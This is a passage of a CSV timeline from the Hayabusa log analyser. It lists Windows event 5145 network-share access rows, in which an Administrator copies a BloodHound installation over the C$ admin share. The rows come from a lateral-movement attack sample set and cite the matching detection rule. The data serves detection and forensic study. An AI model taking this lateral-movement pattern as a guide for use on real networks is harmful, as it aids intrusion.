
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator 
: Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.798 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share 
File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold : IP Address: 